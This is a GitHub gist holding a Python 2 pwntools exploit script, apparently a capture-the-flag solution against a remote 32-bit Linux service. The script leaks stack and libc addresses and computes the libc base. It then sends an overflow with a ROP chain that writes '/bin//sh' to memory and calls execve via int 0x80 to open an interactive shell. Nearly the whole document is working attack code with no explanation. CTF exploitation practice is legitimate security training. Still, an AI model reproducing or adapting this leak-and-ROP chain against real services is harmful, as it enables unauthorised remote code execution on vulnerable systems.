Skip to content

Instantly share code, notes, and snippets.

@mjonasz

mjonasz/babyish.sh

Created November 18, 2017 22:35
Show Gist options
  • Save mjonasz/5570eabf7384ffab0bf6decf91677d36 to your computer and use it in GitHub Desktop.
Save mjonasz/5570eabf7384ffab0bf6decf91677d36 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
babyish.sh
#!/usr/bin/env python2
from pwn import *
from struct import pack,unpack
context(arch = 'i386', os = 'linux', log_level='debug')
#x = process('./vuln')
x = remote('35.198.98.140','45067')
#x = remote('127.0.0.1','6000')
x.recv(timeout=1)
x.sendline('a'*15) # skip 4 bytes
out = x.recv(timeout=1)
setbuf11 = out[28:32] # setbuffer+11 glibc
stack = out[20:24] # some address on stack
setbuf11 = unpack('<I', setbuf11)[0]
stack = unpack('<I', stack)[0]
print format(setbuf11, '08x')
print format(stack, '08x')
good_esp = stack+0xc
arch_offset = 0x6884b
ctf_offset = 0x5fe9b
libc_base = setbuf11-ctf_offset
print format(libc_base, '08x')
x.recv(timeout=2.0)
x.sendline('-1')
x.recv(timeout=1)
# Padding goes here
#x.sendline('a'*60 + 'a'*60)
#x.recv()
#raw_input("klik")
offset = libc_base
writem = stack - 64
p = ''
p += pack('<I', 0x61616161) * 20 # stack adjustment
p += pack('<I', good_esp - (6*4))
p += pack('<I', offset + 0x00017b36) # pop esi ; ret
p += pack('<I', writem + 0x0) # @ .data
p += pack('<I', offset + 0x00001aa6) # pop edx ; ret
p += '/bin'
p += pack('<I', offset + 0x0007e076) # mov dword ptr [esi], edx ; pop ebx ; pop esi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', offset + 0x00017b36) # pop esi ; ret
p += pack('<I', writem + 0x4) # @ .data + 4
p += pack('<I', offset + 0x00001aa6) # pop edx ; ret
p += '//sh'
p += pack('<I', offset + 0x0007e076) # mov dword ptr [esi], edx ; pop ebx ; pop esi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', offset + 0x00017b36) # pop esi ; ret
p += pack('<I', writem + 0x8) # @ .data + 8
#p += pack('<I', offset + 0x00144437) # xor edx, edx ; pop ebx ; pop esi ; pop edi ; ret
p += pack('<I', offset + 0x0007ddc5) # xor edx, edx ; mov eax, edx ; ret
#p += pack('<I', 0x41414141) # padding
#p += pack('<I', 0x41414141) # padding
#p += pack('<I', 0x41414141) # padding
p += pack('<I', offset + 0x0007e076) # mov dword ptr [esi], edx ; pop ebx ; pop esi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', offset + 0x00017fd5) # pop ebx ; ret
p += pack('<I', writem + 0x0) # @ .data
p += pack('<I', offset + 0x000b5e87) # pop ecx ; ret
p += pack('<I', writem + 0x8) # @ .data + 8
p += pack('<I', offset + 0x00001aa6) # pop edx ; ret
p += pack('<I', writem + 0x8) # @ .data + 8
p += pack('<I', offset + 0x0002c6bc) # xor eax, eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00002c8f) # int 0x80
x.sendline(p)
x.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment